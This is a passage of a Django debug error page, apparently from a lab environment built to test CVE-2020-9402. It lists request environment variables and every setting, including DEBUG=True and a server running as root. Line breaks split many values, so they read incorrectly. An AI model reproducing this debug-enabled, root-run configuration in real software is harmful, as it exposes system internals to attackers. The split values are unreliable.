<tr>
<td>REMOTE_ADDR</td>
<td class="code"><pre>&
#39;192.168.2
0.128&
#39;</pre></td>
</tr>
<tr>
<td>REMOTE_HOST</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>REQUEST_METHOD</td>
<td class="code"><pre>&
#39;GET&
#39;</pre></td>
</tr>
<tr>
<td>
RUN_MAIN</td>
<td class="code"><pre>&
#39;true&
#39;</pre></td>
</tr>
<tr>
<td>SCRIPT_NAME</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>SERVER_NAME</td>
<td class="code"><pre>&
#39;zzz
-virtual
-machine&
#39;</pre></td>
</tr>
<tr>
<td>SERVER_PORT</td>
<td class="code"><pre>&
#39;8
000&
#39;</pre></td>
</tr>
<tr>
<td>SERVER_PROTOCOL</td>
<td class="code"><pre>&
#39;HTTP/1.1&
#39;</pre></td>
</tr>
<tr>
<td>SERVER_SOFTWARE</td>
<td class="code"><pre>&
#39;WSGIServer/
0.2&
#39;</pre></td>
</tr>
<tr>
<td>SHELL</td>
<td class="code"><pre>&
#39;/bin/bash&
#39;</pre></td>
</tr>
<tr>
<td>SHLVL</td>
<td class="code"><pre>&
#39;1&
#39;</pre></td>
</tr>
<tr>
<td>SUDO_COMMAND</td>
<td class="code"><pre>&
#39;/bin/bash&
#39;</pre></td>
</tr>
<tr>
<td>SUDO_GID</td>
<td class="code"><pre>&
#39;1
000&
#39;</pre></td>
</tr>
<tr>
<td>SUDO_UID</td>
<td class="code"><pre>&
#39;1
000&
#39;</pre></td>
</tr>
<tr>
<td>SUDO_USER</td>
<td class="code"><pre>&
#39;zzz&
#39;</pre></td>
</tr>
<tr>
<td>TERM</td>
<td class="code"><pre>&
#39;xterm
-256color&
#39;</pre></td>
</tr>
<tr>
<td>TZ</td>
<td class="code"><pre>&
#39;UTC&
#39;</pre></td>
</tr>
<tr>
<td>USER</td>
<td class="code"><pre>&
#39;root&
#39;</pre></td>
</tr>
<tr>
<td>XAUTHORITY</td>
<td class="code"><pre>&
#39;/
run/user/1
000/.mutter
-Xwaylandauth.T2BDG
3&
#39;</pre></td>
</tr>
<tr>
<td>XDG_CURRENT_DESKTOP</td>
<td class="code"><pre>&
#39;ubuntu
:GNOME&
#39;</pre></td>
</tr>
<tr>
<td>XDG_DATA_DIRS</td>
<td class="code"><pre>&
#39;/usr/share/gnome
:/usr/local/share
:/usr/share
:/var/lib/snapd/desktop&
#39;</pre></td>
</tr>
<tr>
<td>_</td>
<td class="code"><pre>&
#39;/usr/bin/python
3&
#39;</pre></td>
</tr>
<tr>
<td>wsgi.errors</td>
<td class="code"><pre><_io.TextIOWrapper name=&
#39;<stderr>&
#39; mode=&
#39;w&
#39; encoding=&
#39;utf
-8&
#39;></pre></td>
</tr>
<tr>
<td>wsgi.file_wrapper</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>wsgi.input</td>
<td class="code"><pre><django.core.handlers.wsgi.LimitedStream object at
0x7eb69
3612f8
0></pre></td>
</tr>
<tr>
<td>wsgi.multiprocess</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>wsgi.multithread</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>wsgi.
run_once</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>wsgi.url_scheme</td>
<td class="code"><pre>&
#39;http&
#39;</pre></td>
</tr>
<tr>
<td>wsgi.version</td>
<td class="code"><pre>(1,
0)</pre></td>
</tr>
</tbody>
</table>
<h
3 id="settings
-info">Settings</h
3>
<h4>Using settings module <code>vuln.settings</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>ABSOLUTE_URL_OVERRIDES</td>
<td class="code"><pre>{}</pre></td>
</tr>
<tr>
<td>ADMINS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>ALLOWED_HOSTS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>APPEND_SLASH</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>AUTHENTICATION_BACKENDS</td>
<td class="code"><pre>[&
#39;django.contrib.auth.backends.ModelBackend&
#39;]</pre></td>
</tr>
<tr>
<td>AUTH_PASSWORD_VALIDATORS</td>
<td class="code"><pre>&
#39;********************&
#39;</pre></td>
</tr>
<tr>
<td>AUTH_USER_MODEL</td>
<td class="code"><pre>&
#39;auth.User&
#39;</pre></td>
</tr>
<tr>
<td>BASE_DIR</td>
<td class="code"><pre>&
#39;/root/django_cve_2
02
0_94
02&
#39;</pre></td>
</tr>
<tr>
<td>CACHES</td>
<td class="code"><pre>{&
#39;default&
#39;
: {&
#39;BACKEND&
#39;
: &
#39;django.core.cache.backends.locmem.LocMemCache&
#39;}}</pre></td>
</tr>
<tr>
<td>CACHE_MIDDLEWARE_ALIAS</td>
<td class="code"><pre>&
#39;default&
#39;</pre></td>
</tr>
<tr>
<td>CACHE_MIDDLEWARE_KEY_PREFIX</td>
<td class="code"><pre>&
#39;********************&
#39;</pre></td>
</tr>
<tr>
<td>CACHE_MIDDLEWARE_SECONDS</td>
<td class="code"><pre>6
00</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_AGE</td>
<td class="code"><pre>
314496
00</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_DOMAIN</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_HTTPONLY</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_NAME</td>
<td class="code"><pre>&
#39;csrftoken&
#39;</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_PATH</td>
<td class="code"><pre>&
#39;/&
#39;</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_SAMESITE</td>
<td class="code"><pre>&
#39;Lax&
#39;</pre></td>
</tr>
<tr>
<td>CSRF_COOKIE_SECURE</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>CSRF_
FAILURE_VIEW</td>
<td class="code"><pre>&
#39;django.views.csrf.csrf_
failure&
#39;</pre></td>
</tr>
<tr>
<td>CSRF_HEADER_NAME</td>
<td class="code"><pre>&
#39;HTTP_X_CSRFTOKEN&
#39;</pre></td>
</tr>
<tr>
<td>CSRF_TRUSTED_ORIGINS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>CSRF_USE_SESSIONS</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>DATABASES</td>
<td class="code"><pre>{&
#39;default&
#39;
: {&
#39;ATOMIC_REQUESTS&
#39;
: False,
&
#39;AUTOCOMMIT&
#39;
: True,
&
#39;CONN_MAX_AGE&
#39;
: 0,
&
#39;ENGINE&
#39;
: &
#39;django.db.backends.sqlite
3&
#39;,
&
#39;HOST&
#39;
: &
#39;&
#39;,
&
#39;NAME&
#39;
: &
#39;/root/django_cve_2
02
0_94
02/db.sqlite
3&
#39;,
&
#39;OPTIONS&
#39;
: {},
&
#39;PASSWORD&
#39;
: &
#39;********************&
#39;,
&
#39;PORT&
#39;
: &
#39;&
#39;,
&
#39;TEST&
#39;
: {&
#39;CHARSET&
#39;
: None,
&
#39;COLLATION&
#39;
: None,
&
#39;MIRROR&
#39;
: None,
&
#39;NAME&
#39;
: None},
&
#39;
TIME_ZONE&
#39;
: None,
&
#39;USER&
#39;
: &
#39;&
#39;}}</pre></td>
</tr>
<tr>
<td>DATABASE_ROUTERS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>DATA_UPLOAD_MAX_MEMORY_SIZE</td>
<td class="code"><pre>262144
0</pre></td>
</tr>
<tr>
<td>DATA_UPLOAD_MAX_NUMBER_FIELDS</td>
<td class="code"><pre>1
000</pre></td>
</tr>
<tr>
<td>DATE
TIME_FORMAT</td>
<td class="code"><pre>&
#39;N j, Y, P&
#39;</pre></td>
</tr>
<tr>
<td>DATE
TIME_INPUT_FORMATS</td>
<td class="code"><pre>[&
#39;%Y
-%m
-%d %H
:%M
:%S&
#39;,
&
#39;%Y
-%m
-%d %H
:%M
:%S.%f&
#39;,
&
#39;%Y
-%m
-%d %H
:%M&
#39;,
&
#39;%Y
-%m
-%d&
#39;,
&
#39;%m/%d/%Y %H
:%M
:%S&
#39;,
&
#39;%m/%d/%Y %H
:%M
:%S.%f&
#39;,
&
#39;%m/%d/%Y %H
:%M&
#39;,
&
#39;%m/%d/%Y&
#39;,
&
#39;%m/%d/%y %H
:%M
:%S&
#39;,
&
#39;%m/%d/%y %H
:%M
:%S.%f&
#39;,
&
#39;%m/%d/%y %H
:%M&
#39;,
&
#39;%m/%d/%y&
#39;]</pre></td>
</tr>
<tr>
<td>DATE_FORMAT</td>
<td class="code"><pre>&
#39;N j, Y&
#39;</pre></td>
</tr>
<tr>
<td>DATE_INPUT_FORMATS</td>
<td class="code"><pre>[&
#39;%Y
-%m
-%d&
#39;,
&
#39;%m/%d/%Y&
#39;,
&
#39;%m/%d/%y&
#39;,
&
#39;%b %d %Y&
#39;,
&
#39;%b %d, %Y&
#39;,
&
#39;%d %b %Y&
#39;,
&
#39;%d %b, %Y&
#39;,
&
#39;%B %d %Y&
#39;,
&
#39;%B %d, %Y&
#39;,
&
#39;%d %B %Y&
#39;,
&
#39;%d %B, %Y&
#39;]</pre></td>
</tr>
<tr>
<td>DEBUG</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>DEBUG_PROPAGATE_EXCEPTIONS</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>DECIMAL_SEPARATOR</td>
<td class="code"><pre>&
#39;.&
#39;</pre></td>
</tr>
<tr>
<td>DEFAULT_CHARSET</td>
<td class="code"><pre>&
#39;utf
-8&
#39;</pre></td>
</tr>
<tr>
<td>DEFAULT_EXCEPTION_REPORTER_FILTER</td>
<td class="code"><pre>&
#39;django.views.debug.SafeExceptionReporterFilter&
#39;</pre></td>
</tr>
<tr>
<td>DEFAULT_FILE_STORAGE</td>
<td class="code"><pre>&
#39;django.core.files.storage.FileSystemStorage&
#39;</pre></td>
</tr>
<tr>
<td>DEFAULT_FROM_EMAIL</td>
<td class="code"><pre>&
#39;webmaster@localhost&
#39;</pre></td>
</tr>
<tr>
<td>DEFAULT_INDEX_TABLESPACE</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>DEFAULT_TABLESPACE</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>DISALLOWED_USER_AGENTS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>EMAIL_BACKEND</td>
<td class="code"><pre>&
#39;django.core.mail.backends.smtp.EmailBackend&
#39;</pre></td>
</tr>
<tr>
<td>EMAIL_HOST</td>
<td class="code"><pre>&
#39;localhost&
#39;</pre></td>
</tr>
<tr>
<td>EMAIL_HOST_PASSWORD</td>
<td class="code"><pre>&
#39;********************&
#39;</pre></td>
</tr>
<tr>
<td>EMAIL_HOST_USER</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>EMAIL_PORT</td>
<td class="code"><pre>25</pre></td>
</tr>
<tr>
<td>EMAIL_SSL_CERTFILE</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>EMAIL_SSL_KEYFILE</td>
<td class="code"><pre>&
#39;********************&
#39;</pre></td>
</tr>
<tr>
<td>EMAIL_SUBJECT_PREFIX</td>
<td class="code"><pre>&
#39;[Django] &
#39;</pre></td>
</tr>
<tr>
<td>EMAIL_
TIMEOUT</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>EMAIL_USE_LOCAL
TIME</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>EMAIL_USE_SSL</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>EMAIL_USE_TLS</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>FILE_CHARSET</td>
<td class="code"><pre>&
#39;utf
-8&
#39;</pre></td>
</tr>
<tr>
<td>FILE_UPLOAD_DIRECTORY_PERMISSIONS</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>FILE_UPLOAD_HANDLERS</td>
<td class="code"><pre>[&
#39;django.core.files.uploadhandler.MemoryFileUploadHandler&
#39;,
&
#39;django.core.files.uploadhandler.TemporaryFileUploadHandler&
#39;]</pre></td>
</tr>
<tr>
<td>FILE_UPLOAD_MAX_MEMORY_SIZE</td>
<td class="code"><pre>262144
0</pre></td>
</tr>
<tr>
<td>FILE_UPLOAD_PERMISSIONS</td>
<td class="code"><pre>42
0</pre></td>
</tr>
<tr>
<td>FILE_UPLOAD_TEMP_DIR</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>FIRST_DAY_OF_WEEK</td>
<td class="code"><pre>
0</pre></td>
</tr>
<tr>
<td>FIXTURE_DIRS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>FORCE_SCRIPT_NAME</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>FORMAT_MODULE_PATH</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>FORM_RENDERER</td>
<td class="code"><pre>&
#39;django.forms.renderers.DjangoTemplates&
#39;</pre></td>
</tr>
<tr>
<td>IGNORABLE_4
04_URLS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>INSTALLED_APPS</td>
<td class="code"><pre>[&
#39;django.contrib.admin&
#39;,
&
#39;django.contrib.auth&
#39;,
&
#39;django.contrib.contenttypes&
#39;,
&
#39;django.contrib.sessions&
#39;,
&
#39;django.contrib.messages&
#39;,
&
#39;django.contrib.staticfiles&
#39;,
&
#39;app&
#39;]</pre></td>
</tr>
<tr>
<td>INTERNAL_IPS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>LANGUAGES</td>
<td class="code"><pre>[(&
#39;af&
#39;, &
#39;Afrikaans&
#39;),
(&
#39;ar&
#39;, &
#39;Arabic&
#39;),
(&
#39;ast&
#39;, &
#39;Asturian&
#39;),
(&
#39;az&
#39;, &
#39;Azerbaijani&
#39;),
(&
#39;bg&
#39;, &
#39;Bulgarian&
#39;),
(&
#39;be&
#39;, &
#39;Belarusian&
#39;),
(&
#39;bn&
#39;, &
#39;Bengali&
#39;),
(&
#39;br&
#39;, &
#39;Breton&
#39;),
(&
#39;bs&
#39;, &
#39;Bosnian&
#39;),
(&
#39;ca&
#39;, &
#39;Catalan&
#39;),
(&
#39;cs&
#39;, &
#39;Czech&
#39;),
(&
#39;cy&
#39;, &
#39;Welsh&
#39;),
(&
#39;da&
#39;, &
#39;Danish&
#39;),
(&
#39;de&
#39;, &
#39;German&
#39;),
(&
#39;dsb&
#39;, &
#39;Lower Sorbian&
#39;),
(&
#39;el&
#39;, &
#39;Greek&
#39;),
(&
#39;en&
#39;, &
#39;English&
#39;),
(&
#39;en
-au&
#39;, &
#39;Australian English&
#39;),
(&
#39;en
-gb&
#39;, &
#39;British English&
#39;),
(&
#39;eo&
#39;, &
#39;Esperanto&
#39;),
(&
#39;es&
#39;, &
#39;Spanish&
#39;),
(&
#39;es
-ar&
#39;, &
#39;Argentinian Spanish&
#39;),
(&
#39;es
-co&
#39;, &
#39;Colombian Spanish&
#39;),
(&
#39;es
-mx&
#39;, &
#39;Mexican Spanish&
#39;),
(&
#39;es
-ni&
#39;, &
#39;Nicaraguan Spanish&
#39;),
(&
#39;es
-ve&
#39;, &
#39;Venezuelan Spanish&
#39;),
(&
#39;et&
#39;, &
#39;Estonian&
#39;),
(&
#39;eu&
#39;, &
#39;Basque&
#39;),
(&
#39;fa&
#39;, &
#39;Persian&
#39;),
(&
#39;fi&
#39;, &
#39;Finnish&
#39;),
(&
#39;fr&
#39;, &
#39;French&
#39;),
(&
#39;fy&
#39;, &
#39;Frisian&
#39;),
(&
#39;ga&
#39;, &
#39;Irish&
#39;),
(&
#39;gd&
#39;, &
#39;Scottish Gaelic&
#39;),
(&
#39;gl&
#39;, &
#39;Galician&
#39;),
(&
#39;he&
#39;, &
#39;Hebrew&
#39;),
(&
#39;hi&
#39;, &
#39;Hindi&
#39;),
(&
#39;hr&
#39;, &
#39;Croatian&
#39;),
(&
#39;hsb&
#39;, &
#39;Upper Sorbian&
#39;),
(&
#39;hu&
#39;, &
#39;Hungarian&
#39;),
(&
#39;hy&
#39;, &
#39;Armenian&
#39;),
(&
#39;ia&
#39;, &
#39;Interlingua&
#39;),
(&
#39;id&
#39;, &
#39;Indonesian&
#39;),
(&
#39;io&
#39;, &
#39;Ido&
#39;),
(&
#39;is&
#39;, &
#39;Icelandic&
#39;),
(&
#39;it&
#39;, &
#39;Italian&
#39;),
(&
#39;ja&
#39;, &
#39;Japanese&
#39;),
(&
#39;ka&
#39;, &
#39;Georgian&
#39;),
(&
#39;kab&
#39;, &
#39;Kabyle&
#39;),
(&
#39;kk&
#39;, &
#39;Kazakh&
#39;),
(&
#39;km&
#39;, &
#39;Khmer&
#39;),
(&
#39;kn&
#39;, &
#39;Kannada&
#39;),
(&
#39;ko&
#39;, &
#39;Korean&
#39;),
(&
#39;lb&
#39;, &
#39;Luxembourgish&
#39;),
(&
#39;lt&
#39;, &
#39;Lithuanian&
#39;),
(&
#39;lv&
#39;, &
#39;Latvian&
#39;),
(&
#39;mk&
#39;, &
#39;Macedonian&
#39;),
(&
#39;ml&
#39;, &
#39;Malayalam&
#39;),
(&
#39;mn&
#39;, &
#39;Mongolian&
#39;),
(&
#39;mr&
#39;, &
#39;Marathi&
#39;),
(&
#39;my&
#39;, &
#39;Burmese&
#39;),
(&
#39;nb&
#39;, &
#39;Norwegian Bokmål&
#39;),
(&
#39;ne&
#39;, &
#39;Nepali&
#39;),
(&
#39;nl&
#39;, &
#39;Dutch&
#39;),
(&
#39;nn&
#39;, &
#39;Norwegian Nynorsk&
#39;),
(&
#39;os&
#39;, &
#39;Ossetic&
#39;),
(&
#39;pa&
#39;, &
#39;Punjabi&
#39;),
(&
#39;pl&
#39;, &
#39;Polish&
#39;),
(&
#39;pt&
#39;, &
#39;Portuguese&
#39;),
(&
#39;pt
-br&
#39;, &
#39;Brazilian Portuguese&
#39;),
(&
#39;ro&
#39;, &
#39;Romanian&
#39;),
(&
#39;ru&
#39;, &
#39;Russian&
#39;),
(&
#39;sk&
#39;, &
#39;Slovak&
#39;),
(&
#39;sl&
#39;, &
#39;Slovenian&
#39;),
(&
#39;sq&
#39;, &
#39;Albanian&
#39;),
(&
#39;sr&
#39;, &
#39;Serbian&
#39;),
(&
#39;sr
-latn&
#39;, &
#39;Serbian Latin&
#39;),
(&
#39;sv&
#39;, &
#39;Swedish&
#39;),
(&
#39;sw&
#39;, &
#39;Swahili&
#39;),
(&
#39;ta&
#39;, &
#39;Tamil&
#39;),
(&
#39;te&
#39;, &
#39;Telugu&
#39;),
(&
#39;th&
#39;, &
#39;Thai&
#39;),
(&
#39;tr&
#39;, &
#39;Turkish&
#39;),
(&
#39;tt&
#39;, &
#39;Tatar&
#39;),
(&
#39;udm&
#39;, &
#39;Udmurt&
#39;),
(&
#39;uk&
#39;, &
#39;Ukrainian&
#39;),
(&
#39;ur&
#39;, &
#39;Urdu&
#39;),
(&
#39;uz&
#39;, &
#39;Uzbek&
#39;),
(&
#39;vi&
#39;, &
#39;Vietnamese&
#39;),
(&
#39;zh
-hans&
#39;, &
#39;Simplified Chinese&
#39;),
(&
#39;zh
-hant&
#39;, &
#39;Traditional Chinese&
#39;)]</pre></td>
</tr>
<tr>
<td>LANGUAGES_BIDI</td>
<td class="code"><pre>[&
#39;he&
#39;, &
#39;ar&
#39;, &
#39;fa&
#39;, &
#39;ur&
#39;]</pre></td>
</tr>
<tr>
<td>LANGUAGE_CODE</td>
<td class="code"><pre>&
#39;en
-us&
#39;</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_AGE</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_DOMAIN</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_HTTPONLY</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_NAME</td>
<td class="code"><pre>&
#39;django_language&
#39;</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_PATH</td>
<td class="code"><pre>&
#39;/&
#39;</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_SAMESITE</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>LANGUAGE_COOKIE_SECURE</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>LOCALE_PATHS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>LOGGING</td>
<td class="code"><pre>{}</pre></td>
</tr>
<tr>
<td>LOGGING_CONFIG</td>
<td class="code"><pre>&
#39;logging.config.dictConfig&
#39;</pre></td>
</tr>
<tr>
<td>LOGIN_REDIRECT_URL</td>
<td class="code"><pre>&
#39;/accounts/profile/&
#39;</pre></td>
</tr>
<tr>
<td>LOGIN_URL</td>
<td class="code"><pre>&
#39;/accounts/login/&
#39;</pre></td>
</tr>
<tr>
<td>LOGOUT_REDIRECT_URL</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>MANAGERS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>MEDIA_ROOT</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>MEDIA_URL</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>MESSAGE_STORAGE</td>
<td class="code"><pre>&
#39;django.contrib.messages.storage.fallback.FallbackStorage&
#39;</pre></td>
</tr>
<tr>
<td>MIDDLEWARE</td>
<td class="code"><pre>[&
#39;django.middleware.security.SecurityMiddleware&
#39;,
&
#39;django.contrib.sessions.middleware.SessionMiddleware&
#39;,
&
#39;django.middleware.common.CommonMiddleware&
#39;,
&
#39;django.middleware.csrf.CsrfViewMiddleware&
#39;,
&
#39;django.contrib.auth.middleware.AuthenticationMiddleware&
#39;,
&
#39;django.contrib.messages.middleware.MessageMiddleware&
#39;,
&
#39;django.middleware.clickjacking.XFrameOptionsMiddleware&
#39;]</pre></td>
</tr>
<tr>
<td>MIGRATION_MODULES</td>
<td class="code"><pre>{}</pre></td>
</tr>
<tr>
<td>MONTH_DAY_FORMAT</td>
<td class="code"><pre>&
#39;F j&
#39;</pre></td>
</tr>
<tr>
<td>NUMBER_GROUPING</td>
<td class="code"><pre>
0</pre></td>
</tr>
<tr>
<td>PASSWORD_HASHERS</td>
<td class="code"><pre>&
#39;********************&
#39;</pre></td>
</tr>
<tr>
<td>PASSWORD_RESET_
TIMEOUT_DAYS</td>
<td class="code"><pre>&
#39;********************&
#39;</pre></td>
</tr>
<tr>
<td>PREPEND_WWW</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>ROOT_URLCONF</td>
<td class="code"><pre>&
#39;vuln.urls&
#39;</pre></td>
</tr>
<tr>
<td>SECRET_KEY</td>
<td class="code"><pre>&
#39;********************&
#39;</pre></td>
</tr>
<tr>
<td>SECURE_BROWSER_XSS_FILTER</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SECURE_CONTENT_TYPE_NOSNIFF</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>SECURE_HSTS_INCLUDE_SUBDOMAINS</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SECURE_HSTS_PRELOAD</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SECURE_HSTS_SECONDS</td>
<td class="code"><pre>
0</pre></td>
</tr>
<tr>
<td>SECURE_PROXY_SSL_HEADER</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>SECURE_REDIRECT_EXEMPT</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>SECURE_REFERRER_POLICY</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>SECURE_SSL_HOST</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>SECURE_SSL_REDIRECT</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SERVER_EMAIL</td>
<td class="code"><pre>&
#39;root@localhost&
#39;</pre></td>
</tr>
<tr>
<td>SESSION_CACHE_ALIAS</td>
<td class="code"><pre>&
#39;default&
#39;</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_AGE</td>
<td class="code"><pre>12
096
00</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_DOMAIN</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_HTTPONLY</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_NAME</td>
<td class="code"><pre>&
#39;sessionid&
#39;</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_PATH</td>
<td class="code"><pre>&
#39;/&
#39;</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_SAMESITE</td>
<td class="code"><pre>&
#39;Lax&
#39;</pre></td>
</tr>
<tr>
<td>SESSION_COOKIE_SECURE</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SESSION_ENGINE</td>
<td class="code"><pre>&
#39;django.contrib.sessions.backends.db&
#39;</pre></td>
</tr>
<tr>
<td>SESSION_EXPIRE_AT_BROWSER_CLOSE</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SESSION_FILE_PATH</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>SESSION_SAVE_EVERY_REQUEST</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>SESSION_SERIALIZER</td>
<td class="code"><pre>&
#39;django.contrib.sessions.serializers.JSONSerializer&
#39;</pre></td>
</tr>
<tr>
<td>SETTINGS_MODULE</td>
<td class="code"><pre>&
#39;vuln.settings&
#39;</pre></td>
</tr>
<tr>
<td>SHORT_DATE
TIME_FORMAT</td>
<td class="code"><pre>&
#39;m/d/Y P&
#39;</pre></td>
</tr>
<tr>
<td>SHORT_DATE_FORMAT</td>
<td class="code"><pre>&
#39;m/d/Y&
#39;</pre></td>
</tr>
<tr>
<td>SIGNING_BACKEND</td>
<td class="code"><pre>&
#39;django.core.signing.
TimestampSigner&
#39;</pre></td>
</tr>
<tr>
<td>SILENCED_SYSTEM_
CHECKS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>STATICFILES_DIRS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>STATICFILES_FINDERS</td>
<td class="code"><pre>[&
#39;django.contrib.staticfiles.finders.FileSystemFinder&
#39;,
&
#39;django.contrib.staticfiles.finders.AppDirectoriesFinder&
#39;]</pre></td>
</tr>
<tr>
<td>STATICFILES_STORAGE</td>
<td class="code"><pre>&
#39;django.contrib.staticfiles.storage.StaticFilesStorage&
#39;</pre></td>
</tr>
<tr>
<td>STATIC_ROOT</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>STATIC_URL</td>
<td class="code"><pre>&
#39;/static/&
#39;</pre></td>
</tr>
<tr>
<td>TEMPLATES</td>
<td class="code"><pre>[{&
#39;APP_DIRS&
#39;
: True,
&
#39;BACKEND&
#39;
: &
#39;django.template.backends.django.DjangoTemplates&
#39;,
&
#39;DIRS&
#39;
: [],
&
#39;OPTIONS&
#39;
: {&
#39;context_processors&
#39;
: [&
#39;django.template.context_processors.debug&
#39;,
&
#39;django.template.context_processors.request&
#39;,
&
#39;django.contrib.auth.context_processors.auth&
#39;,
&
#39;django.contrib.messages.context_processors.messages&
#39;]}}]</pre></td>
</tr>
<tr>
<td>TEST_NON_SERIALIZED_APPS</td>
<td class="code"><pre>[]</pre></td>
</tr>
<tr>
<td>TEST_
RUNNER</td>
<td class="code"><pre>&
#39;django.test.
runner.Discover
Runner&
#39;</pre></td>
</tr>
<tr>
<td>THOUSAND_SEPARATOR</td>
<td class="code"><pre>&
#39;,&
#39;</pre></td>
</tr>
<tr>
<td>
TIME_FORMAT</td>
<td class="code"><pre>&
#39;P&
#39;</pre></td>
</tr>
<tr>
<td>
TIME_INPUT_FORMATS</td>
<td class="code"><pre>[&
#39;%H
:%M
:%S&
#39;, &
#39;%H
:%M
:%S.%f&
#39;, &
#39;%H
:%M&
#39;]</pre></td>
</tr>
<tr>
<td>
TIME_ZONE</td>
<td class="code"><pre>&
#39;UTC&
#39;</pre></td>
</tr>
<tr>
<td>USE_I18N</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>USE_L1
0N</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>USE_THOUSAND_SEPARATOR</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>USE_TZ</td>
<td class="code"><pre>True</pre></td>
</tr>
<tr>
<td>USE_X_FORWARDED_HOST</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>USE_X_FORWARDED_PORT</td>
<td class="code"><pre>False</pre></td>
</tr>
<tr>
<td>WSGI_APPLICATION</td>
<td class="code"><pre>&
#39;vuln.wsgi.application&
#39;</pre></td>
</tr>
<tr>
<td>X_FRAME_OPTIONS</td>
<td class="code"><pre>&
#39;DENY&
#39;</pre></td>
</tr>
<tr>
<td>YEAR_MONTH_FORMAT</td>
<td class="code"><pre>&
#39;F Y&
#39;</pre></td>
</tr>
</tbody>
</table>
</div>
<div id="explanation">
<p>
You&
#39;re seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard page generated by the handler for this status code.
</p>
</div>
</body>
</html>
